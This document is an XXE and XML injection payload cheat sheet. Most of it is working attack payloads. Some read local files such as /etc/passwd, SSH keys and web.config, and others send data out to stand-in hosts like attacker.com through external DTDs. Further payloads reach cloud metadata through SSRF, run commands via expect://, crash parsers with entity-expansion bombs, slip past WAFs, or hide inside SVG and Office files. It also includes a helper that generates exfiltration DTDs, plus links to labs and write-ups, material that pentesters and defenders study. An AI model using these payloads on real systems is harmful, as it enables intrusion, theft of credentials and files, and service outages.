XML Injection
XML (Extensible Markup Language) is a format for structuring and transferring data between systems. It is similar to JSON, but older and more verbose. Web apps often use XML to communicate with databases, APIs, or other services. XML Injection happens when a web app doesn’t properly validate or sanitize XML input, letting attackers sneak in malicious XML data.
This can lead to data leaks, authentication bypasses, or even full system compromise. For example, if an app processes user-supplied XML without checks, an attacker can inject custom XML tags to manipulate queries, extract hidden data, or trigger XXE (XML External Entity) attacks, which can expose internal files or allow server-side request forgery (SSRF).
- XML Injection = Messing with XML data to break an app’s logic and security
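As a minimal sketch of the tag-injection case described above, the Python snippet below builds the same document twice: once by pasting user input in verbatim and once after escaping it. The function names and the user/role document layout are hypothetical and only serve the illustration.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape


def build_user_unsafe(name: str) -> str:
    # User input is pasted into the document verbatim.
    return f"<user><name>{name}</name><role>user</role></user>"


def build_user_safe(name: str) -> str:
    # escape() turns &, < and > into entities, so the input stays plain text.
    return f"<user><name>{escape(name)}</name><role>user</role></user>"


def roles(document: str) -> list[str]:
    # Collect the text of every <role> element in the parsed document.
    return [node.text for node in ET.fromstring(document).iter("role")]


payload = "bob</name><role>admin</role><name>x"
print(roles(build_user_unsafe(payload)))  # ['admin', 'user']
print(roles(build_user_safe(payload)))    # ['user']
```

In the unsafe variant the injected role element appears before the legitimate one, so any code that reads the first role sees admin.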
Detecting XML External Entity (XXE) Vulnerability
An XML External Entity attack occurs when an XML parser processes external entities defined in a DTD (Document Type Definition). This allows attackers to read local files, perform SSRF (Server-Side Request Forgery), or, in some configurations, execute remote code.
Internal Entity Usage (Safe)
<!-- Internal entity declaration --> <!DOCTYPE safeExample [<!ENTITY example "Doe"> ]><userInfo> <firstName>John</firstName> <lastName>&example;</lastName> </userInfo>
External Entity Exploitation (Vulnerable to XXE)
<!DOCTYPE attack [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <userInfo><firstName>John</firstName> <lastName>&xxe;</lastName> </userInfo>
SSRF Attack via XXE
<!DOCTYPE attack [ <!ENTITY xxe SYSTEM "http://attacker.com/malicious"> ]> <userInfo><firstName>John</firstName> <lastName>&xxe;</lastName> </userInfo>
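One way to tell the safe and vulnerable documents above apart without fetching anything is to list the entity declarations that carry a SYSTEM identifier. The sketch below uses Python's built-in expat bindings, which report declarations through EntityDeclHandler and do not resolve external entities unless a handler is installed for that. The function name external_entities is hypothetical.

```python
from xml.parsers import expat


def external_entities(document: str) -> list[tuple[str, str]]:
    """Return (name, system_id) for every entity declared with SYSTEM."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry a value and no system identifier.
        if system_id is not None:
            found.append((name, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(document, True)
    return found


vulnerable = (
    '<!DOCTYPE attack [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    "<userInfo><lastName>&xxe;</lastName></userInfo>"
)
print(external_entities(vulnerable))
```

A document that only declares internal entities yields an empty list, so a non-empty result is a reasonable signal to reject or log the input.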
XXE Exploitation Techniques
Extracting sensitive files like /etc/passwd (Linux) or C:\boot.ini (Windows).
Linux:
<?xml version="1.0"?>
<!DOCTYPE root [ <!ENTITY test SYSTEM 'file:///etc/passwd'> ]>
<root>&test;</root>
Windows:
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///c:/boot.ini"> ]>
<foo>&xxe;</foo>
OOB XXE (Out-of-Band Exfiltration)
If direct file output is blocked, attackers can send it to an external server.
<!DOCTYPE foo [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]>
<foo>&send;</foo>
evil.dtd file on the attacker’s server
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/log?%file;'>">
%all;
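The external DTD follows a fixed three-step pattern: load the file into a parameter entity, wrap it in a declaration that embeds it in a URL, then expand that declaration. The Python helper below is a small sketch that renders this pattern for a given file URI and callback URL; build_oob_dtd and its parameters are hypothetical names.

```python
def build_oob_dtd(file_uri: str, callback_url: str) -> str:
    """Render an external DTD that appends a file's content to a callback URL."""
    return (
        # Step 1: %file; holds the content of the target file.
        f'<!ENTITY % file SYSTEM "{file_uri}">\n'
        # Step 2: %all; declares the general entity "send" with %file; in its URL.
        f"<!ENTITY % all \"<!ENTITY send SYSTEM '{callback_url}?%file;'>\">\n"
        # Step 3: expanding %all; makes &send; available to the document.
        "%all;\n"
    )


print(build_oob_dtd("file:///etc/passwd", "http://attacker.com/log"))
```

The document that loads this DTD still has to reference &send; in its body for the request to be made.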
Blind XXE (Triggering Requests Without Response)
Used when responses are not reflected but requests are processed. A real-world case is described at http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html.
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://attacker.com/log"> ]> <root>&xxe;</root>
Using expect:// for Remote Code Execution (PHP-Specific)
If PHP’s expect:// wrapper is enabled, commands can be executed.
<!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "expect://id"> ]> <foo>&xxe;</foo>
Classic XXE - Reading Local Files
Used to read system files like /etc/passwd on Linux or C:\boot.ini on Windows.
Linux:
<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
Windows:
<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///c:/boot.ini">]><foo>&xxe;</foo>
Base64 Encoding for Evasion
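If filters block payloads that contain an obvious file:// reference, the entity value can be delivered through a Base64-encoded data:// URI instead. The encoded string below decodes to file:///etc/passwd, so the target path never appears in plain text, which makes detection harder. Support for the data:// scheme depends on the parser.
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]> <foo/>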
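To see what the parser actually receives from the data:// URI in this payload, the Base64 segment can be decoded locally. A short Python sketch follows; decode_data_uri is a hypothetical helper name.

```python
import base64


def decode_data_uri(uri: str) -> str:
    """Decode the Base64 body of a data: URI into text."""
    header, _, encoded = uri.partition(",")
    if not header.endswith(";base64"):
        raise ValueError("not a Base64 data URI")
    return base64.b64decode(encoded).decode("utf-8")


print(decode_data_uri("data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"))
# file:///etc/passwd
```

The same decoding step is useful on the defensive side: a filter that only searches the raw request for file:// will miss this payload unless it decodes data: URIs first.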
PHP Wrapper - Extracting Source Code
The php://filter wrapper allows attackers to base64-encode and extract PHP source code. Extracts index.php and encodes it in Base64, useful for code analysis.
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><contacts><contact><name>Jean &xxe; Dupont</name></contact></contacts>
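When the application reflects the entity, the Base64 text shows up between the surrounding words (here Jean and Dupont). The Python sketch below picks the longest whitespace-separated token that decodes cleanly; the response text is a made-up example and decode_leak is a hypothetical name.

```python
import base64
import binascii


def decode_leak(text: str) -> bytes:
    """Decode the longest whitespace-separated token that is valid Base64."""
    for token in sorted(text.split(), key=len, reverse=True):
        try:
            return base64.b64decode(token, validate=True)
        except binascii.Error:
            continue
    raise ValueError("no Base64 token found")


# Simulated reflected value: the encoded source sits between the two names.
leaked = base64.b64encode(b"<?php echo 'hi'; ?>").decode("ascii")
print(decode_leak(f"Jean {leaked} Dupont"))
```

Choosing the longest token is a heuristic; short ordinary words can also happen to be valid Base64, so the result should be checked by eye.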
SSRF via XXE
Extracts AWS instance metadata, leading to cloud infrastructure compromise.
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>
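The metadata address 169.254.169.254 is a link-local address, which is what makes it reachable only from the instance itself. As a rough sketch, a Python check like the one below can flag SYSTEM identifiers that point at loopback, private, or link-local addresses. The function name is hypothetical, and hostnames are deliberately not resolved, so this covers literal IP addresses only.

```python
import ipaddress
from urllib.parse import urlsplit


def targets_internal_address(system_id: str) -> bool:
    """Return True when the URL host is a literal internal IP address."""
    host = urlsplit(system_id).hostname
    if host is None:
        return False  # e.g. file:// URIs have no host part
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname; resolving it is out of scope for this sketch
    return address.is_private or address.is_loopback or address.is_link_local


print(targets_internal_address("http://169.254.169.254/latest/meta-data/"))  # True
print(targets_internal_address("http://attacker.com/log"))                   # False
```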
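OOB XXE (Out-of-Band Exploitation)
Impact: The parser sends a request to an external server (attacker.com), bypassing security controls. As written, the URL carries only the literal string file:///etc/passwd; sending the contents of the file requires the parameter-entity technique with an external DTD.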
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://attacker.com/log?data=file:///etc/passwd">]><foo>&xxe;</foo>
Exploiting Public Identifiers
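Requests an external DTD through a PUBLIC identifier, allowing remote file inclusion. The &xxe; entity referenced in the body must be declared in the remote payload.xml.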
<!DOCTYPE foo PUBLIC "Random Text" "http://attacker.com/payload.xml"><foo>&xxe;</foo>
XInclude Attacks
When you can't modify the DOCTYPE element, you can use XInclude to target local files or internal resources. XInclude allows XML documents to include content from external sources, making it a useful vector for exploiting XXE vulnerabilities.
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/> </foo>
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///C:/Windows/win.ini"/> </foo>
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="http://malicious.com/payload.xml"/> </foo>
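Because XInclude needs no DOCTYPE, checks that only look for DTDs miss it. The Python sketch below lists the href targets of any xi:include elements in a document. It relies on the fact that xml.etree.ElementTree parses these elements as ordinary nodes and does not process them unless ElementInclude is called explicitly. The function name is hypothetical.

```python
import xml.etree.ElementTree as ET

# Namespace-qualified tag name for <xi:include>, whatever prefix the document uses.
XINCLUDE_TAG = "{http://www.w3.org/2001/XInclude}include"


def xinclude_targets(document: str) -> list[str]:
    """Return the href of every XInclude element, without following any of them."""
    root = ET.fromstring(document)
    return [node.get("href", "") for node in root.iter(XINCLUDE_TAG)]


doc = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/>'
    "</foo>"
)
print(xinclude_targets(doc))  # ['file:///etc/passwd']
```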
Exploiting XXE to Perform SSRF Attacks
XXE (XML External Entity) vulnerabilities can be combined with SSRF (Server-Side Request Forgery) to access internal services and extract sensitive information.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt" >]>
<foo>&xxe;</foo>

<?xml version="1.0"?>
<!DOCTYPE data [<!ENTITY % remote SYSTEM "http://internal.service/admin">%remote;]>
<data></data>

<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY % payload SYSTEM "http://attacker.com/evil.dtd">%payload;]>
<test></test>
Exploiting XXE to Perform a Denial of Service (DoS)
These attacks can crash services or entire servers. Do not use them in production environments.
Quadratic Blowup Attack
Unlike the Billion Laughs attack, this payload exploits XML parsers by repeating a large entity, causing extreme processing delays and memory consumption.
<!DOCTYPE data [<!ENTITY x "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"><!ENTITY y "&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;">]><data>&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;</data>
YAML Recursive Reference Bomb
This YAML payload abuses anchors (&) and aliases (*): each list references the previous one nine times, so the fully expanded structure grows exponentially and leads to excessive memory usage when parsed.
x: &x
y: *x
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
Deeply Nested XML Bomb
This attack uses deep recursion instead of entity expansion, forcing the XML parser to exceed stack depth limits.
<data><item><item><item><item><item><item><item><item><item><item>Deep recursion attack!</item></item></item></item></item></item></item></item></item></item></data>
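A common mitigation for deep nesting is to track element depth while streaming and abort once a limit is passed. The Python sketch below does this with expat start and end handlers, so no tree is built and no recursion is involved. The limit of 100 and the names max_depth and DepthLimitExceeded are assumptions made for the example.

```python
from xml.parsers import expat


class DepthLimitExceeded(Exception):
    """Raised when a document nests deeper than the configured limit."""


def max_depth(document: str, limit: int = 100) -> int:
    """Return the deepest element nesting level, aborting past the limit."""
    depth = 0
    deepest = 0

    def on_start(name, attrs):
        nonlocal depth, deepest
        depth += 1
        deepest = max(deepest, depth)
        if depth > limit:
            raise DepthLimitExceeded(f"nesting deeper than {limit}")

    def on_end(name):
        nonlocal depth
        depth -= 1

    parser = expat.ParserCreate()
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.Parse(document, True)
    return deepest


nested = "<data>" + "<item>" * 10 + "x" + "</item>" * 10 + "</data>"
print(max_depth(nested))  # 11
```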
Billion Laughs Attack
<!DOCTYPE data [<!ENTITY a0 "dos" ><!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"><!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"><!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"><!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">]><data>&a4;</data>
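The growth in this payload can be worked out without expanding anything: each level references the previous one ten times, so four levels over the three-character string "dos" expand to 3 × 10^4 characters. The Python sketch below computes the expanded length from the declarations alone. The helper names are hypothetical, and the regular expressions only handle simple double-quoted internal entities without cycles.

```python
import re
from functools import lru_cache

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r"&(\w+);")


def expanded_length(dtd: str, name: str) -> int:
    """Length of an entity after full expansion, computed without expanding it."""
    entities = dict(ENTITY_DECL.findall(dtd))

    @lru_cache(maxsize=None)
    def size(entity: str) -> int:
        value = entities[entity]
        literal = len(ENTITY_REF.sub("", value))  # characters that are not references
        return literal + sum(size(ref) for ref in ENTITY_REF.findall(value))

    return size(name)


def laughs_dtd(depth: int, fanout: int = 10) -> str:
    """Build declarations a0..a<depth> in the same shape as the payload above."""
    decls = ['<!ENTITY a0 "dos">']
    for level in range(1, depth + 1):
        refs = f"&a{level - 1};" * fanout
        decls.append(f'<!ENTITY a{level} "{refs}">')
    return "".join(decls)


print(expanded_length(laughs_dtd(4), "a4"))  # 30000
print(expanded_length(laughs_dtd(9), "a9"))  # 3000000000
```

A parser-side limit on total expansion size, rather than on the size of the input, is what stops this class of payload.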
Parameters Laugh Attack
A variant of the Billion Laughs attack, this technique leverages delayed interpretation of parameter entities, causing excessive memory consumption and processing delays in XML parsers.
<!DOCTYPE r [<!ENTITY % pe_1 "<!---->"><!ENTITY % pe_2 "%pe_1;<!---->%pe_1;"><!ENTITY % pe_3 "%pe_2;<!---->%pe_2;"><!ENTITY % pe_4 "%pe_3;<!---->%pe_3;">%pe_4;]><r/>
Exploiting Error-Based XXE
Error-based XML External Entity (XXE) attacks rely on forcing the application to disclose error messages, which can leak sensitive file contents or system information.
Using Local DTD for Error-Based Exfiltration
If error-based exfiltration is possible, a local DTD file can be used for concatenation tricks, confirming if error messages expose file names.
<!DOCTYPE root [<!ENTITY % local_dtd SYSTEM "file:///abcxyz/">%local_dtd;]><root></root>
Advanced Error-Based XXE: Reading File Contents via Error Messages
By referencing a non-existent entity inside a local DTD, attackers can trick the XML parser into leaking parts of a file through error messages.
<!DOCTYPE root [<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % int "<!ENTITY exfil SYSTEM 'file:///nonexistent/%file;'>">%int;]><root>&exfil;</root>
Error-Based XXE via OOB (Out-Of-Band) Exfiltration
If error messages do not disclose enough information, but DNS or HTTP requests are allowed, file contents can be exfiltrated using an external DTD.
<!DOCTYPE root [<!ENTITY % ext SYSTEM "http://attacker.com/malicious.dtd">%ext;]><root></root>
List DTDs and generate XXE payloads using those local DTDs.
Linux Local DTD Exploitation
A list of existing DTD files on Linux can be found with locate .dtd. The fonts.dtd file contains an injectable entity %constant at line 148, making it a potential attack vector.
/usr/share/xml/fontconfig/fonts.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/usr/share/xml/svg/svg10.dtd
/usr/share/xml/svg/svg11.dtd
/usr/share/yelp/dtd/docbookx.dtd
Local File Disclosure (Linux)
This payload leverages fonts.dtd to exfiltrate the contents of /etc/passwd. The same approach reads other sensitive files (.bash_history, .ssh/id_rsa). The parser tries to open a nonexistent path under /tmp/leak/ whose name contains the file contents, so the contents surface in the resulting error message.
<!DOCTYPE message [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
  <!ENTITY % constant 'aaa)>
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///tmp/leak/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
    <!ELEMENT aa (bb'>
  %local_dtd;
]>
<message>Text</message>
Windows Local DTD Exploitation
Common Windows local DTD files that can be abused
C:\Windows\System32\wbem\xml\cim20.dtd
Local File Disclosure (Windows)
Uses cim20.dtd to read sensitive files (web.config, php.ini).
<!DOCTYPE doc [
  <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
  <!ENTITY % SuperClass '>
    <!ENTITY &#x25; file SYSTEM "file://D:\webserv2\services\web.config">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://t/#&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
    <!ENTITY test "test"'>
  %local_dtd;
]>
<xxx>anything</xxx>
Triggering the XXE Vulnerability
The XXE payload fetches a malicious remote DTD from attacker.com. The SYSTEM keyword loads an external DTD. If the parser supports external entities, ext.dtd will be processed.
<?xml version="1.0" ?><!DOCTYPE message [<!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">%ext;]><message></message>
Malicious DTD Content - Extracting /etc/passwd
1: Using an Error-Based Technique
Defines an entity %file to read /etc/passwd. Defines %eval, which creates another entity (%error). Triggers an error by requesting a nonexistent file whose path has the /etc/passwd content appended. If the application includes error messages in HTTP responses, the file contents leak.
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
2: Alternative Exfiltration via URL Encoding
%data; loads /etc/passwd. %eval; builds a new entity %leak;. %leak; uses the file content as the scheme of a URL, so the content appears in the resulting error message.
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; leak SYSTEM '%data;:///'>">
%eval;
%leak;
Blind XXE - Exfiltrating Data Out of Band (OOB)
When an application does not return XML parsing errors or output, Out-of-Band (OOB) XXE can be used to extract data. If the application is vulnerable, it will make a request to burpcollaborator.net, confirming XXE exploitation potential.
Basic Blind XXE with Burp Collaborator
To detect blind XXE, try requesting an external resource (e.g., Burp Collaborator)
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x">%ext;]><r></r>
Exfiltrating /etc/passwd via HTTP Request
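%xxe; reads /etc/passwd, and &callhome; is intended to send its first line to www.malicious.com. Many parsers reject parameter-entity references inside declarations in the internal DTD subset, in which case the declarations must be moved to an external DTD.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "file:///etc/passwd"><!ENTITY callhome SYSTEM "http://www.malicious.com/?%xxe;">]>
<foo>&callhome;</foo>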
OOB XXE Attack (Yunusov, 2013)
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd"><data>&send;</data>
Remote DTD File (parameterEntity_oob.dtd)
The external DTD loads file:///sys/power/image_size.
&send; sends its content to publicServer.com.
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;
XXE OOB with PHP Filters
Bypassing direct file access using PHP’s base64 encoding
<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">%sp;%param1;]><r>&exfil;</r>
Malicious DTD File (dtd.xml)
php://filter encodes /etc/passwd in base64.
&exfil; sends it to 127.0.0.1/dtd.xml.
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
Apache Karaf CVE-2018-11788 XXE OOB
Vulnerable Apache Karaf versions: ≤ 4.2.1, ≤ 4.1.6
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com">%dtd;]>
<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">
<feature name="deployer" version="2.0" install="auto"></feature>
</features>
WAF Bypasses and XXE Exploitation Techniques
XML parsers use four methods to detect encoding:
- HTTP Content-Type
Content-Type: text/xml; charset=utf-8
- Reading Byte Order Mark (BOM)
- Reading the first bytes of the document (the encoded form of <?xm)
UTF-8: 3C 3F 78 6D
UTF-16BE: 00 3C 00 3F
UTF-16LE: 3C 00 3F 00
- XML Declaration:
<?xml version="1.0" encoding="UTF-8"?>
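These detection rules matter for WAF bypasses because a filter that searches the raw request body for ASCII keywords will not match a document re-encoded as UTF-16, while the XML parser still decodes it. The Python sketch below maps the leading byte patterns listed above to an encoding and shows the keyword disappearing from the raw bytes. The names sniff_encoding and PREFIXES are hypothetical.

```python
from typing import Optional

# First four bytes of a document that starts with "<?xm", per encoding.
PREFIXES = {
    bytes.fromhex("3C3F786D"): "UTF-8",
    bytes.fromhex("003C003F"): "UTF-16BE",
    bytes.fromhex("3C003F00"): "UTF-16LE",
}


def sniff_encoding(data: bytes) -> Optional[str]:
    """Guess the encoding from the first four bytes; None when nothing matches."""
    return PREFIXES.get(data[:4])


document = (
    '<?xml version="1.0" encoding="UTF-16BE"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
)
raw = document.encode("utf-16-be")

print(sniff_encoding(raw))                # UTF-16BE
print(b"<!ENTITY" in raw)                 # False: every character is now two bytes
print(b"<!ENTITY" in document.encode())   # True for the UTF-8 form
```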
XXE Exploitation Techniques
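An endpoint that accepts JSON may also accept XML when the Content-Type header is changed.
application/json
{"search":"name","value":"test"}
application/xml
<?xml version="1.0" encoding="UTF-8" ?><root><search>name</search><value>data</value></root>
An error response like the following shows that the body reached an XML parser:
{ "errors":{ "errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity." } }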
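Converting the JSON body into its XML counterpart by hand is error-prone for larger requests. The Python sketch below does it for a flat JSON object, assuming every key is a valid element name. The function name and the root element name are assumptions; the target application may expect a different wrapper element.

```python
import json
import xml.etree.ElementTree as ET


def json_body_to_xml(body: str, root_name: str = "root") -> str:
    """Turn a flat JSON object into <root><key>value</key>...</root>."""
    root = ET.Element(root_name)
    for key, value in json.loads(body).items():
        ET.SubElement(root, key).text = str(value)
    return ET.tostring(root, encoding="unicode")


print(json_body_to_xml('{"search":"name","value":"test"}'))
# <root><search>name</search><value>test</value></root>
```

The result is then sent with Content-Type: application/xml, and a DOCTYPE can be prepended once the endpoint is confirmed to parse XML.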
XXE Inside Exotic Files
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"> <image xlink:href="expect://ls" width="200" height="200"></image> </svg>
Classic Exploit
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
Out-of-Band (OOB) XXE via SVG Rasterization
<?xml version="1.0" standalone="yes"?><!DOCTYPE svg [<!ELEMENT svg ANY ><!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">%sp;%param1;]><svg viewBox="0 0 200 200" version="1.2" xmlns="http://www.w3.org/2000/svg" style="fill:red"><text x="15" y="100" style="fill:black">XXE via SVG rasterization</text></svg>
XXE Inside SOAP
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
XXE Inside Office Files
Inject XXE payload into .xml files within a .docx:
/word/document.xml
/ppt/presentation.xml
/xl/workbook.xml
/_rels/.rels
[Content_Types].xml
Update the ZIP file
zip -u xxe.docx [Content_Types].xml
Tool XXE in XLSX
7z x -oXXE xxe.xlsx
cd XXE
zip -u ../xxe.xlsx *
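The extract, edit, and re-zip cycle can also be done in memory. The Python sketch below rewrites one part of an Office archive with the standard zipfile module and keeps the other parts and their order unchanged. The name replace_part is hypothetical, and the archive in the example is a two-file stand-in rather than a real workbook.

```python
import io
import zipfile


def replace_part(archive: bytes, part_name: str, new_content: bytes) -> bytes:
    """Return a copy of the ZIP archive with one member's content replaced."""
    output = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive)) as source, \
            zipfile.ZipFile(output, "w", zipfile.ZIP_DEFLATED) as target:
        for info in source.infolist():
            # Copy every member as-is except the one being replaced.
            data = new_content if info.filename == part_name else source.read(info.filename)
            target.writestr(info.filename, data)
    return output.getvalue()


# Stand-in archive with the two parts mentioned in this section.
original = io.BytesIO()
with zipfile.ZipFile(original, "w") as z:
    z.writestr("[Content_Types].xml", "<Types/>")
    z.writestr("xl/workbook.xml", "<workbook/>")

patched = replace_part(original.getvalue(), "xl/workbook.xml", b"<cdl/>")
with zipfile.ZipFile(io.BytesIO(patched)) as z:
    print(z.namelist())
    print(z.read("xl/workbook.xml"))
```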
Inject Payload in xl/workbook.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]>
<cdl>&rrr;</cdl>
Or inject in xl/sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si></sst>
Write-ups
- A Deep Dive into XXE Injection
- Automating local DTD discovery for XXE exploitation
- Blind OOB XXE At UBER 26+ Domains Hacked
- CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server
- Data exfiltration using XXE on a hardened server
- Detecting and exploiting XXE in SAML Interfaces
- Exploiting XXE in file upload functionality
- EXPLOITING XXE WITH EXCEL
- Exploiting XXE with local DTD files
- From blind XXE to root-level file read access
- How we got read access on Google’s production servers
- Midnight Sun CTF 2019 Quals
- OOB XXE through SAML
- Payloads for Cisco and Citrix
- Pentest XXE
- Playing with Content-Type – XXE on JSON Endpoints
- REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS
- XML attacks
- XML external entity (XXE) injection
- XML External Entity (XXE) Processing
- XXE in Uber to read local files
- XXE inside SVG - YEO QUAN YANG
- XXE: How to become a Jedi
Cheatsheet
- XXE ALL THE THINGS!!!
- XXE payloads
- PayloadsAllTheThings
- XML External Entity (XXE) Injection Payload List
Labs
- Root Me - XML External Entity
- PortSwigger Labs for XXE
- Exploiting XXE using external entities to retrieve files
- Exploiting XXE to perform SSRF attacks
- Blind XXE with out-of-band interaction
- Blind XXE with out-of-band interaction via XML parameter entities
- Exploiting blind XXE to exfiltrate data using a malicious external DTD
- Exploiting blind XXE to retrieve data via error messages
- Exploiting XInclude to retrieve files
- Exploiting XXE via image file upload
- Exploiting XXE to retrieve data by repurposing a local DTD
- GoSecure workshop - Advanced XXE Exploitation